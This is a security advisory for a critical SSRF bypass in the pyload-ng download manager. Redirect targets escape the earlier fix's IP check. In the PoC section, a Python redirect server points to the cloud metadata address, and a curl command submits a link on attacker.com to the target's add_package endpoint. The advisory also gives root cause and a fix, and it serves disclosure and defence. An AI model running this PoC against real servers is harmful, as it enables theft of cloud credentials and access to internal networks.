PT-2026-30339 · Pypi · Pyload-Ng
Published
2026-04-04
·
Updated
2026-04-04
·
CVE-2026-35459
CVSS v4.0
9.3
Critical
| AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N |
Summary
The fix for CVE-2026-33992 (GHSA-m74m-f7cr-432x) added IP validation to
BaseDownloader.download() that checks the hostname of the initial download URL. However, pycurl is configured with FOLLOWLOCATION=1 and MAXREDIRS=10, causing it to automatically follow HTTP redirects. Redirect targets are never validated against the SSRF filter.An authenticated user with ADD permission can bypass the SSRF fix by submitting a URL that redirects to an internal address.
Root Cause
The SSRF check at
src/pyload/plugins/base/downloader.py:335-341 validates only the initial URL:dl hostname = urllib.parse.urlparse(dl url).hostname
if is ip address(dl hostname) and not is global address(dl hostname):
self.fail(...)
else:
for ip in host to ip(dl hostname):
if not is global address(ip):
self.fail(...)
After the check passes,
download() is called. pycurl is configured at src/pyload/core/network/http/http request.py:114-115 to follow redirects:self.c.setopt(pycurl.FOLLOWLOCATION, 1)
self.c.setopt(pycurl.MAXREDIRS, 10)
No
CURLOPT REDIR PROTOCOLS restriction is set anywhere in HTTPRequest. Redirect targets bypass the SSRF filter entirely.PoC
Redirect server (attacker-controlled):
from http.server import HTTPServer, BaseHTTPRequestHandler
class RedirectHandler(BaseHTTPRequestHandler):
def do GET(self):
self.send response(302)
self.send header("Location", "http://169.254.169.254/metadata/v1.json")
self.end headers()
HTTPServer(("0.0.0.0", 8888), RedirectHandler).serve forever()
Submit to pyload (requires ADD permission):
curl -b cookies.txt -X POST 'http://target:8000/json/add package'
-d 'add name=ssrf-test&add dest=1&add links=http://attacker.com:8888/redirect'
The SSRF check resolves
attacker.com to a public IP and passes. pycurl follows the 302 redirect to http://169.254.169.254/metadata/v1.json without validation. Cloud metadata is downloaded and saved to the storage folder.Impact
An authenticated user with ADD permission can access:
- Cloud metadata endpoints (169.254.169.254) for AWS, GCP, DigitalOcean, Azure — including IAM credentials and instance identity
- Internal network services (10.x, 172.16.x, 192.168.x)
- Localhost services (127.0.0.1)
This is the same impact as CVE-2026-33992 (rated Critical), achieved through a single redirect hop. The severity is reduced from Critical to High because authentication with ADD permission is now required.
Suggested Fix
Disable automatic redirect following and validate each redirect target:
In HTTPRequest. init ():
self.c.setopt(pycurl.FOLLOWLOCATION, 0)
Then implement manual redirect following in the download logic with SSRF validation at each hop. Alternatively, restrict redirect protocols:
self.c.setopt(pycurl.REDIR PROTOCOLS, pycurl.PROTO HTTP | pycurl.PROTO HTTPS)
And add a pycurl callback to validate redirect destination IPs before following.
Resources
- CVE-2026-33992 / GHSA-m74m-f7cr-432x: Original SSRF (Critical, unauthenticated). This bypass requires ADD permission.
Fix
SSRF
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Pyload-Ng